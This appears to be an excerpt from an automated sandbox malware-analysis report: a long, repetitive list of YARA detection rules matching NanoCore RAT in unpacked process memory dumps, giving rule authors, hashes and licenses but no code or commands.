      Source: 29.3.ihgsvw.exe.12d5e90.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.52d0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.12c76a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.ec6330.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.3c307ce.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 22.2.RegSvcs.exe.2c496bc.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 26.3.ihgsvw.exe.13306b0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 21.3.ihgsvw.exe.f2f340.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 29.3.ihgsvw.exe.12d5e90.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 17.3.ihgsvw.exe.19926a8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.17a7628.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.6214629.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 10.2.RegSvcs.exe.2c63db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 35.3.ihgsvw.exe.1810638.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
